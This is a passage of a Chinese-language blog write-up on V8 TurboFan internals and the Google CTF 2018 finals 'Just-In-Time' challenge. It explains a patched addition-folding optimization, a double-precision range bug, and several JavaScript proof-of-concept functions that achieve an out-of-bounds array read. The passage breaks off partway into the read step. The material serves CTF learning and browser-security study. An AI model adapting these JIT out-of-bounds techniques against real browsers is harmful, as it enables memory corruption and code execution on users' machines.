设置`FLAG_branch_load_poisoning`</span></span><br><span class="line"><span class="built_in">DEFINE_BOOL</span>(branch_load_poisoning, <span class="literal">false</span>, <span class="string">&quot;Mask loads with branch conditions.&quot;</span>)</span><br></pre></td></tr></table></figure><figure class="highlight python"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br></pre></td><td class="code"><pre><span class="line"><span class="comment"># BUILD.gn</span></span><br><span class="line">declare_args() &#123;</span><br><span class="line">  <span class="comment"># ...</span></span><br><span class="line">  <span class="comment"># Enable mitigations for executing untrusted code.</span></span><br><span class="line">  <span class="comment"># 默认为true</span></span><br><span class="line">  v8_untrusted_code_mitigations = true</span><br><span class="line">  <span class="comment"># ...</span></span><br><span class="line">&#125;</span><br><span class="line"><span class="comment"># ...</span></span><br><span class="line"><span class="keyword">if</span> (!v8_untrusted_code_mitigations) &#123;</span><br><span class="line">    defines += [ <span class="string">&quot;DISABLE_UNTRUSTED_CODE_MITIGATIONS&quot;</span> ]</span><br><span class="line">  &#125;</span><br><span class="line"><span class="comment"># ...</span></span><br></pre></td></tr></table></figure><p>这样就会使得<code>load_poisoning</code>始终为<code>PoisoningMitigationLevel::kPoisonCriticalOnly</code>，因此始终无法执行<code>checkBounds</code>的优化操作。所以我们需要手动设置编译参数<code>v8_untrusted_code_mitigations = false</code>，以启动checkbounds的优化。</p></li><li><p>以下是一个简单checkbounds优化的例子</p><figure class="highlight js"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br></pre></td><td class="code"><pre><span class="line"><span class="keyword">function</span> <span class="title function_">f</span>(<span class="params">x</span>)</span><br><span class="line">&#123;</span><br><span class="line">  <span class="keyword">const</span> arr = <span class="keyword">new</span> <span class="title class_">Array</span>(<span class="number">1.1</span>, <span class="number">2.2</span>, <span class="number">3.3</span>, <span class="number">4.4</span>, <span class="number">5.5</span>);</span><br><span class="line">  <span class="keyword">let</span> t = <span class="number">1</span> + <span class="number">1</span>;</span><br><span class="line">  <span class="keyword">return</span> arr[t];</span><br><span class="line">&#125;</span><br><span class="line"></span><br><span class="line"><span class="variable language_">console</span>.<span class="title function_">log</span>(<span class="title function_">f</span>(<span class="number">1</span>));</span><br><span class="line">%<span class="title class_">OptimizeFunctionOnNextCall</span>(f);</span><br><span class="line"><span class="variable language_">console</span>.<span class="title function_">log</span>(<span class="title function_">f</span>(<span class="number">1</span>));</span><br></pre></td></tr></table></figure><p>优化前发现存在一个checkBounds：</p><p><img src="/2021/01/v8-turboFan/checkbounds1.png" alt="img"></p><p>执行完<code>SimplifiedLoweringPhase</code>后，<code>CheckBounds</code>被优化了:</p><p><img src="/2021/01/v8-turboFan/checkbounds2.png" alt="img"></p></li></ul><blockquote><p>基础概念介绍到这里，接下来我们学习一道CTF题来练练手。</p></blockquote><h2 id="六、Google-CTF-2018-final-Just-In-Time">六、Google CTF 2018(final) Just-In-Time</h2><h3 id="1-简介-2">1. 简介</h3><p>Google CTF 2018(final) Just-In-Time 是 v8 的一道基础题，适合用于v8即时编译的入门，其目标是执行<code>/usr/bin/gnome-calculator</code>以弹出计算器。在这里我们通过这道题目来学习一下v8的相关概念。</p><p>这道题的题解在安全客上有很多，但由于这是笔者初次接触 v8 的题，因此这次我们就详细讲一下其中的细节。</p><ul><li>题目来源 - <a href="https://ctftime.org/task/6982">ctftime - task6982</a></li><li>Just-In-Time 官方附件及其exp - <a href="https://github.com/google/google-ctf/tree/master/2018/finals/pwn-just-in-time">github</a></li></ul><h3 id="2-环境搭建">2. 环境搭建</h3><p>题目给的附件（ctftime中的附件，不是github上的附件）内含一个已编译好的chromium和两个patch文件。</p><ul><li><code>nosandbox.patch</code> : 该文件用于关闭renderer的沙箱机制。</li><li><code>addition-reducer.patch</code> : 本题的重头戏。</li><li><code>chromium</code> ：版本号为<code>70.0.3538.9</code>的二进制包（已打patch）</li></ul><p>不过由于笔者已经搭了v8的环境，因此决定采用源码编译的方式来编译出一个v8，这样的好处是<strong>可以更方便的进行调试</strong>。该题的v8版本为<strong>7.0.276.3</strong>，可以通过<code>chrome://version</code>来获取，或者去<a href="https://omahaproxy.appspot.com/">OmahaProxy CSV Viewer</a>中查询。</p><figure class="highlight bash"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br></pre></td><td class="code"><pre><span class="line"><span class="comment"># 开代理</span></span><br><span class="line"><span class="built_in">sudo</span> service privoxy start</span><br><span class="line"><span class="built_in">export</span> https_proxy=http://127.0.0.1:8118</span><br><span class="line"><span class="built_in">export</span> http_proxy=http://127.0.0.1:8118</span><br><span class="line"><span class="comment"># 切换chromium版本</span></span><br><span class="line"><span class="built_in">cd</span> v8/</span><br><span class="line">git checkout 7.0.276.3 <span class="comment"># 如果需要force，则添加-f参数。gclient同样如此。</span></span><br><span class="line">gclient <span class="built_in">sync</span> <span class="comment"># 这一步需要代理（很重要）,需要N久,取决网速。</span></span><br><span class="line"></span><br><span class="line"><span class="comment"># gclient sync完成后再打个patch</span></span><br><span class="line">git apply ../../../CTF/GoogleCTF2018_Just-In-Time/addition-reducer.patch</span><br><span class="line"><span class="comment"># 设置一下编译参数</span></span><br><span class="line">tools/dev/v8gen.py x64.debug</span><br><span class="line"><span class="comment"># 设置允许优化checkbounds</span></span><br><span class="line"><span class="built_in">echo</span> <span class="string">&quot;v8_untrusted_code_mitigations = false&quot;</span> &gt;&gt; out.gn/x64.debug/args.gn</span><br><span class="line"><span class="comment"># 编译</span></span><br><span class="line">ninja -C out.gn/x64.debug</span><br></pre></td></tr></table></figure><blockquote><p>为什么要设置<code>v8_untrusted_code_mitigations = false</code>，请查看上面关于<code>SimplifiedLoweringPhase</code>中checkbounds优化的简单讲解。</p><p>这里可能是因为出题者忘记给出v8的编译参数了，否则默认的编译参数将<strong>无法利用漏洞</strong>。</p></blockquote><h3 id="3-漏洞成因">3. 漏洞成因</h3><ul><li><p>新打的patch将在turboFan中的<code>TypedLoweringPhase</code>中添加了一种优化方式。</p><figure class="highlight cpp"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br><span class="line">24</span><br><span class="line">25</span><br><span class="line">26</span><br><span class="line">27</span><br><span class="line">28</span><br><span class="line">29</span><br><span class="line">30</span><br><span class="line">31</span><br><span class="line">32</span><br><span class="line">33</span><br><span class="line">34</span><br><span class="line">35</span><br><span class="line">36</span><br><span class="line">37</span><br><span class="line">38</span><br><span class="line">39</span><br></pre></td><td class="code"><pre><span class="line"><span class="function">Reduction <span class="title">DuplicateAdditionReducer::Reduce</span><span class="params">(Node* node)</span> </span>&#123;</span><br><span class="line">  <span class="keyword">switch</span> (node-&gt;<span class="built_in">opcode</span>()) &#123;</span><br><span class="line">    <span class="keyword">case</span> IrOpcode::kNumberAdd:</span><br><span class="line">      <span class="keyword">return</span> <span class="built_in">ReduceAddition</span>(node);</span><br><span class="line">    <span class="keyword">default</span>:</span><br><span class="line">      <span class="keyword">return</span> <span class="built_in">NoChange</span>();</span><br><span class="line">  &#125;</span><br><span class="line">&#125;</span><br><span class="line"></span><br><span class="line"><span class="function">Reduction <span class="title">DuplicateAdditionReducer::ReduceAddition</span><span class="params">(Node* node)</span> </span>&#123;</span><br><span class="line">  <span class="built_in">DCHECK_EQ</span>(node-&gt;<span class="built_in">op</span>()-&gt;<span class="built_in">ControlInputCount</span>(), <span class="number">0</span>);</span><br><span class="line">  <span class="built_in">DCHECK_EQ</span>(node-&gt;<span class="built_in">op</span>()-&gt;<span class="built_in">EffectInputCount</span>(), <span class="number">0</span>);</span><br><span class="line">  <span class="built_in">DCHECK_EQ</span>(node-&gt;<span class="built_in">op</span>()-&gt;<span class="built_in">ValueInputCount</span>(), <span class="number">2</span>);</span><br><span class="line"></span><br><span class="line">  Node* left = NodeProperties::<span class="built_in">GetValueInput</span>(node, <span class="number">0</span>);</span><br><span class="line">  <span class="keyword">if</span> (left-&gt;<span class="built_in">opcode</span>() != node-&gt;<span class="built_in">opcode</span>()) &#123;</span><br><span class="line">    <span class="keyword">return</span> <span class="built_in">NoChange</span>();</span><br><span class="line">  &#125;</span><br><span class="line"></span><br><span class="line">  Node* right = NodeProperties::<span class="built_in">GetValueInput</span>(node, <span class="number">1</span>);</span><br><span class="line">  <span class="keyword">if</span> (right-&gt;<span class="built_in">opcode</span>() != IrOpcode::kNumberConstant) &#123;</span><br><span class="line">    <span class="keyword">return</span> <span class="built_in">NoChange</span>();</span><br><span class="line">  &#125;</span><br><span class="line"></span><br><span class="line">  Node* parent_left = NodeProperties::<span class="built_in">GetValueInput</span>(left, <span class="number">0</span>);</span><br><span class="line">  Node* parent_right = NodeProperties::<span class="built_in">GetValueInput</span>(left, <span class="number">1</span>);</span><br><span class="line">  <span class="keyword">if</span> (parent_right-&gt;<span class="built_in">opcode</span>() != IrOpcode::kNumberConstant) &#123;</span><br><span class="line">    <span class="keyword">return</span> <span class="built_in">NoChange</span>();</span><br><span class="line">  &#125;</span><br><span class="line"></span><br><span class="line">  <span class="type">double</span> const1 = <span class="built_in">OpParameter</span>&lt;<span class="type">double</span>&gt;(right-&gt;<span class="built_in">op</span>());</span><br><span class="line">  <span class="type">double</span> const2 = <span class="built_in">OpParameter</span>&lt;<span class="type">double</span>&gt;(parent_right-&gt;<span class="built_in">op</span>());</span><br><span class="line">  Node* new_const = <span class="built_in">graph</span>()-&gt;<span class="built_in">NewNode</span>(<span class="built_in">common</span>()-&gt;<span class="built_in">NumberConstant</span>(const1+const2));</span><br><span class="line"></span><br><span class="line">  NodeProperties::<span class="built_in">ReplaceValueInput</span>(node, parent_left, <span class="number">0</span>);</span><br><span class="line">  NodeProperties::<span class="built_in">ReplaceValueInput</span>(node, new_const, <span class="number">1</span>);</span><br><span class="line"></span><br><span class="line">  <span class="keyword">return</span> <span class="built_in">Changed</span>(node);</span><br><span class="line">&#125;</span><br></pre></td></tr></table></figure><p>该优化方式将优化诸如<code>x + 1 + 2</code>这类的表达式为<code>x + 3</code>，即以下的Case4：</p><p><img src="/2021/01/v8-turboFan/schema_vuln_ctf.png" alt="img"></p></li><li><p>但是，还记得我们之前所提到的，NumberConstant的内部实现使用的是<code>double</code>类型。这就意味着这样的优化可能存在精度丢失。举个例子：</p><p><img src="/2021/01/v8-turboFan/JStest.png" alt="img"></p><p>即，<code>x + 1 + 1</code>不一定会等于<code>x + 2</code>！所以这种优化是存在问题的。</p></li><li><p>这是为什么呢？原因是浮点数的IEEE764标准。当一个浮点数越来越大时，有限的空间只能保留高位的数据，因此一旦浮点数的值超过某个界限时，低位数值将被舍弃，此时数值不能全部表示，存在精度丢失。</p><p>而这个界限正是 $2^{53}-1 = 9007199254740991$，即上图中的<code>MAX_sAFE_INTEGER</code>。</p><figure class="highlight cpp"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br></pre></td><td class="code"><pre><span class="line"><span class="comment">// 以下是double结构的9007199254740991值，可以看到正好是double结构所能存放的最大整数。</span></span><br><span class="line">+------+--------------+------------------------------------------------------+‭</span><br><span class="line">| sign |    exponent  |                fraction                              |</span><br><span class="line">+------+--------------+------------------------------------------------------+</span><br><span class="line">|   <span class="number">0</span>  |  <span class="number">00000000001</span> | <span class="number">1111111111111111111111111111111111111111111111111111</span>‬ |</span><br><span class="line">+------+--------------+------------------------------------------------------+</span><br></pre></td></tr></table></figure></li><li><p>由于<code>x + 1 + 1 &lt;= x + 2</code>，因此某个<code>NumberAdd</code>结点的<code>Type</code>，也就是<strong>其Range将会小于该结点本身的值</strong> 。例如</p><ul><li><code>9007199254740992</code> 连续两次 <strong>+1</strong> 后，由于精度丢失，导致最后一个<code>NumberAdd</code>结点的Type为<code>Range(9007199254740992,9007199254740992)</code>。</li><li>但由于执行了patch中的优化，导致最后一个加法操作实际的结果为<code>9007199254740994</code>，大于Range的最大值。</li><li>因此，如果使用这个结果值来访问数组的话，可能存在越界读写的问题，因为若预期index小于length的最小范围时，checkBounds结点将会被优化，此时比<strong>预期index</strong> 范围更大的 <strong>实际index</strong> 很有可能成功越界。</li></ul></li></ul><h3 id="4-漏洞利用">4. 漏洞利用</h3><h4 id="a-OOB">a. OOB</h4><h5 id="1-构造POC">1) 构造POC</h5><ul><li><p>我们先试一下POC</p><figure class="highlight js"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br></pre></td><td class="code"><pre><span class="line"><span class="keyword">function</span> <span class="title function_">f</span>(<span class="params">x</span>)</span><br><span class="line">&#123;</span><br><span class="line">    <span class="keyword">const</span> arr = [<span class="number">1.1</span>, <span class="number">2.2</span>, <span class="number">3.3</span>, <span class="number">4.4</span>, <span class="number">5.5</span>]; <span class="comment">// length =&gt; Range(5, 5)</span></span><br><span class="line">    <span class="keyword">let</span> t = (x == <span class="number">1</span> ? <span class="number">9007199254740992</span> : <span class="number">9007199254740989</span>);</span><br><span class="line">    <span class="comment">// 此时 t =&gt; 解释/编译 Range(9007199254740989, 9007199254740992)</span></span><br><span class="line">    t = t + <span class="number">1</span> + <span class="number">1</span>;</span><br><span class="line">    <span class="comment">/* 此时 t =&gt; </span></span><br><span class="line"><span class="comment">        解释：Range(9007199254740991, 9007199254740992)</span></span><br><span class="line"><span class="comment">        编译：Range(9007199254740991, 9007199254740994)</span></span><br><span class="line"><span class="comment">    */</span></span><br><span class="line">    t -= <span class="number">9007199254740989</span>;</span><br><span class="line">    <span class="comment">/* 此时 t =&gt; </span></span><br><span class="line"><span class="comment">        解释：Range(2, 3)</span></span><br><span class="line"><span class="comment">        编译：Range(2, 5)</span></span><br><span class="line"><span class="comment">    */</span></span><br><span class="line">    <span class="keyword">return</span> arr[t];</span><br><span class="line">&#125;</span><br><span class="line"></span><br><span class="line"><span class="variable language_">console</span>.<span class="title function_">log</span>(<span class="title function_">f</span>(<span class="number">1</span>));</span><br><span class="line">%<span class="title class_">OptimizeFunctionOnNextCall</span>(f);</span><br><span class="line"><span class="variable language_">console</span>.<span class="title function_">log</span>(<span class="title function_">f</span>(<span class="number">1</span>));</span><br></pre></td></tr></table></figure><p>Type后的结果如下，可以看到checkbounds的检查可以通过：</p><p><img src="/2021/01/v8-turboFan/poc_1.png" alt="img"></p><p>因此该checkbounds将在<code>SimplifiedLoweringPhase</code>中被优化：</p><p><img src="/2021/01/v8-turboFan/poc_2.png" alt="img"></p><p>输出的结果如下：</p><blockquote><p>注：输出结果中的<code>DuplicateAdditionReducer::ReduceAddition Called/Success</code>，是打patch后的输出内容，在原v8中没有该输出。</p></blockquote><p><img src="/2021/01/v8-turboFan/ctfoutput1.png" alt="img"></p><p>可以看到，成功将两个+1操作优化为+2，并在最末尾处成功<strong>越界读取</strong>到一个数组外的元素。</p></li><li><p>这里需要说一下构建poc可能存在的问题：</p><ul><li><p>POC1：<strong>无 if 分支</strong></p><figure class="highlight js"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br></pre></td><td class="code"><pre><span class="line"><span class="keyword">function</span> <span class="title function_">f</span>(<span class="params">x</span>)</span><br><span class="line">&#123;</span><br><span class="line">    <span class="keyword">const</span> arr = [<span class="number">1.1</span>, <span class="number">2.2</span>, <span class="number">3.3</span>, <span class="number">4.4</span>, <span class="number">5.5</span>];</span><br><span class="line">    <span class="comment">// 这里没有使用上面if xxx这样的语句，直接一个整数赋值</span></span><br><span class="line">    </span><br><span class="line">    <span class="comment">// let t = Number.MAX_SAFE_INTEGER + 1; </span></span><br><span class="line">    <span class="keyword">let</span> t = <span class="number">9007199254740992</span>; </span><br><span class="line">    t = t + <span class="number">1</span> + <span class="number">1</span>;</span><br><span class="line">    t -= <span class="number">9007199254740989</span>;</span><br><span class="line">    <span class="keyword">return</span> arr[t];</span><br><span class="line">&#125;</span><br><span class="line"></span><br><span class="line"><span class="variable language_">console</span>.<span class="title function_">log</span>(<span class="title function_">f</span>(<span class="number">1</span>));</span><br><span class="line">%<span class="title class_">OptimizeFunctionOnNextCall</span>(f);</span><br><span class="line"><span class="variable language_">console</span>.<span class="title function_">log</span>(<span class="title function_">f</span>(<span class="number">1</span>));</span><br></pre></td></tr></table></figure><p><strong>问题点</strong>：由于函数中常数与常数相加减，因此在执行<code>TypedLoweringPhase</code>中的<code>ConstantFoldingReducer</code>时，三个算数表达式会直接优化为一个常数，这样就没办法执行<code>DuplicateAdditionReducer</code>。</p><p><img src="/2021/01/v8-turboFan/poc1.png" alt="img"></p><p><strong>解决方法</strong>：使用一个<code>if</code>分支，这样就可以通过<code>phi</code>结点来间接设置<code>Range</code>。</p></li></ul><blockquote><p>以下是一些玄学问题。</p></blockquote><ul><li><p>POC2：<strong>使用<code>Number.MAX_SAFE_INTEGER</code></strong></p><figure class="highlight js"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br></pre></td><td class="code"><pre><span class="line"><span class="keyword">function</span> <span class="title function_">f</span>(<span class="params">x</span>)</span><br><span class="line">&#123;</span><br><span class="line">  <span class="keyword">const</span> arr = [<span class="number">1.1</span>, <span class="number">2.2</span>, <span class="number">3.3</span>, <span class="number">4.4</span>, <span class="number">5.5</span>];</span><br><span class="line">    <span class="keyword">let</span> t = (x == <span class="number">1</span> ? <span class="title class_">Number</span>.<span class="property">MAX_SAFE_INTEGER</span> + <span class="number">1</span> </span><br><span class="line">        : <span class="title class_">Number</span>.<span class="property">MAX_SAFE_INTEGER</span> - <span class="number">2</span>);</span><br><span class="line">    t = t + <span class="number">1</span> + <span class="number">1</span>;</span><br><span class="line">    t -= (<span class="title class_">Number</span>.<span class="property">MAX_SAFE_INTEGER</span> - <span class="number">2</span>);</span><br><span class="line">    <span class="keyword">return</span> arr[t];</span><br><span class="line">&#125;</span><br><span class="line"></span><br><span class="line"><span class="variable language_">console</span>.<span class="title function_">log</span>(<span class="title function_">f</span>(<span class="number">1</span>));</span><br><span class="line">%<span class="title class_">OptimizeFunctionOnNextCall</span>(f);</span><br><span class="line"><span class="variable language_">console</span>.<span class="title function_">log</span>(<span class="title function_">f</span>(<span class="number">1</span>));</span><br></pre></td></tr></table></figure><p><strong>问题点</strong>：在<code>GraphBuilderPhase</code>中，type feedback推测目标函数的参数只会为<code>1</code>，因此turboFan推测函数中的条件判断式 <strong>“恒”成立</strong> ，故在<code>InliningPhase</code>中优化<code>merge</code>结点，使得变量<code>t</code>始终为一个常数。</p><p><img src="/2021/01/v8-turboFan/poc2_1.png" alt="img"></p><p>之后就执行<code>TypedLoweringPhase</code>中的<code>ConstantFoldingReducer</code>再次将其优化为一个常数，以至于无法执行<code>DuplicateAdditionReducer</code>优化。</p><p>通过turbolizer我们可以看出，若判断条件为真，则将优化好的结果输出；若判断条件为假，则说明type feedback出现错误，需要执行deopt。</p><p><img src="/2021/01/v8-turboFan/poc2.png" alt="img"></p><blockquote><p>至于为什么先前的poc不会优化merge结点，而当前这个poc会优化merge结点，</p><p>这个问题仍然需要进一步探索。</p></blockquote><p><strong>解决方法</strong>：</p><ol><li><p>不同时在 if 语句的两个分支处使用<code>Number.MAX_SAFE_INTEGER</code></p> <figure class="highlight js"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br></pre></td><td class="code"><pre><span class="line"><span class="keyword">function</span> <span class="title function_">f</span>(<span class="params">x</span>)</span><br><span class="line">&#123;</span><br><span class="line">    <span class="keyword">const</span> arr = [<span class="number">1.1</span>, <span class="number">2.2</span>, <span class="number">3.3</span>, <span class="number">4.4</span>, <span class="number">5.5</span>];</span><br><span class="line">    <span class="keyword">let</span> t = (x == <span class="number">1</span> ? <span class="title class_">Number</span>.<span class="property">MAX_SAFE_INTEGER</span> + <span class="number">1</span> </span><br><span class="line">        <span class="comment">// 修改了此处</span></span><br><span class="line">        : <span class="number">9007199254740989</span>);</span><br><span class="line">    t = t + <span class="number">1</span> + <span class="number">1</span>;</span><br><span class="line">    t -= (<span class="title class_">Number</span>.<span class="property">MAX_SAFE_INTEGER</span> - <span class="number">2</span>);</span><br><span class="line">    <span class="keyword">return</span> arr[t];</span><br><span class="line">&#125;</span><br><span class="line"></span><br><span class="line"><span class="variable language_">console</span>.<span class="title function_">log</span>(<span class="title function_">f</span>(<span class="number">1</span>));</span><br><span class="line">%<span class="title class_">OptimizeFunctionOnNextCall</span>(f);</span><br><span class="line"><span class="variable language_">console</span>.<span class="title function_">log</span>(<span class="title function_">f</span>(<span class="number">1</span>));</span><br></pre></td></tr></table></figure></li><li><p>在执行<code>%OptimizeFunctionOnNextCall</code>前，使函数调用传入的参数<strong>不单一</strong>:</p> <figure class="highlight js"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br></pre></td><td class="code"><pre><span class="line"><span class="keyword">function</span> <span class="title function_">f</span>(<span class="params">x</span>)</span><br><span class="line">&#123;</span><br><span class="line">    <span class="keyword">const</span> arr = [<span class="number">1.1</span>, <span class="number">2.2</span>, <span class="number">3.3</span>, <span class="number">4.4</span>, <span class="number">5.5</span>];</span><br><span class="line">    <span class="keyword">let</span> t = (x == <span class="number">1</span> ? <span class="title class_">Number</span>.<span class="property">MAX_SAFE_INTEGER</span> + <span class="number">1</span> </span><br><span class="line">          : <span class="title class_">Number</span>.<span class="property">MAX_SAFE_INTEGER</span> - <span class="number">2</span>);</span><br><span class="line">    t = t + <span class="number">1</span> + <span class="number">1</span>;</span><br><span class="line">    t -= (<span class="title class_">Number</span>.<span class="property">MAX_SAFE_INTEGER</span> - <span class="number">2</span>);</span><br><span class="line">  <span class="keyword">return</span> arr[t];</span><br><span class="line">&#125;</span><br><span class="line">  </span><br><span class="line"><span class="variable language_">console</span>.<span class="title function_">log</span>(<span class="title function_">f</span>(<span class="number">1</span>));</span><br><span class="line"><span class="variable language_">console</span>.<span class="title function_">log</span>(<span class="title function_">f</span>(<span class="number">0</span>));  <span class="comment">// 添加了此行</span></span><br><span class="line">%<span class="title class_">OptimizeFunctionOnNextCall</span>(f);</span><br><span class="line"><span class="variable language_">console</span>.<span class="title function_">log</span>(<span class="title function_">f</span>(<span class="number">1</span>));</span><br></pre></td></tr></table></figure></li></ol></li><li><p>POC3：<strong>不使用<code>let/var/const</code>修饰词</strong></p><figure class="highlight js"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br></pre></td><td class="code"><pre><span class="line"><span class="keyword">function</span> <span class="title function_">f</span>(<span class="params">x</span>)</span><br><span class="line">&#123;</span><br><span class="line">    <span class="comment">// 错误：arr前没有let、var或者const</span></span><br><span class="line">    arr = [<span class="number">1.1</span>, <span class="number">2.2</span>, <span class="number">3.3</span>, <span class="number">4.4</span>, <span class="number">5.5</span>];</span><br><span class="line">    <span class="comment">// 错误：t 前没有let</span></span><br><span class="line">    t = (x == <span class="number">1</span> ? <span class="number">9007199254740992</span> : <span class="number">9007199254740989</span>);</span><br><span class="line">    t = t + <span class="number">1</span> + <span class="number">1</span>;</span><br><span class="line">    t -= <span class="number">9007199254740989</span>;</span><br><span class="line">    <span class="keyword">return</span> arr[t];</span><br><span class="line">&#125;</span><br><span class="line"></span><br><span class="line"><span class="variable language_">console</span>.<span class="title function_">log</span>(<span class="title function_">f</span>(<span class="number">1</span>));</span><br><span class="line">%<span class="title class_">OptimizeFunctionOnNextCall</span>(f);</span><br><span class="line"><span class="variable language_">console</span>.<span class="title function_">log</span>(<span class="title function_">f</span>(<span class="number">1</span>));</span><br></pre></td></tr></table></figure><p><strong>问题点</strong>：经过gdb动态调试可知，若数组前没有修饰词，则<code>CheckBounds</code>的上一个结点<code>LoadField</code>结点将不会被<code>LoadEliminationPhase</code>优化，这样使得数组<code>length</code>结点的范围最大值为134217726，最后导致无法成功优化<code>CheckBounds</code>结点：</p><p><img src="/2021/01/v8-turboFan/poc3.png" alt="img"></p><p>同时，若变量<code>t</code>前没有修饰词，则越界的<code>add</code>操作将被<code>check</code>出，进而设置值为<code>inf/NaN</code>，之后的减法就无法计算出我们所期望的Range值：</p><p><img src="/2021/01/v8-turboFan/poc3_1.png" alt="img"></p><p><strong>解决方法</strong>：添加修饰词。</p><blockquote><p>因为没有修饰词 let / var 的变量都是全局变量，而 Load Elimination 的优化对作用域有一定的要求，因此全局变量的 LoadField 结点将不会被优化。</p></blockquote></li><li><p>POC4：使用<strong>整数数组</strong></p>  <figure class="highlight js"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br></pre></td><td class="code"><pre><span class="line"><span class="keyword">function</span> <span class="title function_">f</span>(<span class="params">x</span>)</span><br><span class="line">&#123;</span><br><span class="line">    <span class="keyword">const</span> arr = [<span class="number">1</span>, <span class="number">2</span>, <span class="number">3</span>, <span class="number">4</span>, <span class="number">5</span>];</span><br><span class="line">    <span class="keyword">let</span> t = (x == <span class="number">1</span> ? <span class="number">9007199254740992</span> : <span class="number">9007199254740989</span>);</span><br><span class="line">    t = t + <span class="number">1</span> + <span class="number">1</span>;</span><br><span class="line">    t -= <span class="number">9007199254740989</span>;</span><br><span class="line">    <span class="keyword">return</span> arr[t];</span><br><span class="line">&#125;</span><br><span class="line"></span><br><span class="line"><span class="variable language_">console</span>.<span class="title function_">log</span>(<span class="title function_">f</span>(<span class="number">1</span>));</span><br><span class="line">%<span class="title class_">OptimizeFunctionOnNextCall</span>(f);</span><br><span class="line"><span class="variable language_">console</span>.<span class="title function_">log</span>(<span class="title function_">f</span>(<span class="number">1</span>));</span><br></pre></td></tr></table></figure><p><strong>问题点</strong>：执行<code>console.log</code>时崩溃：</p><p><img src="/2021/01/v8-turboFan/poc4.png" alt="img"></p><p><strong>解决方法</strong>：更改数组类型。经过一番测试，发现貌似只能改成<strong>浮点数数组</strong>，改成其他类型的输出都会<strong>崩溃</strong>。</p></li><li><p>小结：构造POC需要重复多次 <strong>修改代码 =&gt; 观察输出 =&gt; 从turbolizer中查看结点图 =&gt; 分析错误原因</strong> 这个过程，有时还需要给源码打patch和上gdb调试，需要耐心。</p></li></ul></li><li><p>构造POC时，只需要关注两个重点：</p><ol><li><p>能否成功执行<code>DuplicateAdditionReducer</code>优化</p></li><li><p>能否成功优化<code>CheckBounds</code>结点。</p></li></ol><p>如果这两个条件都满足，那基本上构建出的POC可以OOB了。</p></li></ul><h5 id="2-越界读取">2) 越界读取</h5><p>POC有了，那我们试着看一下越界读取到的内存位置，</p><p>不出以外的话应该是最后一个元素<code>5.5</code>的下一个8位数据：</p><figure class="highlight js"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span 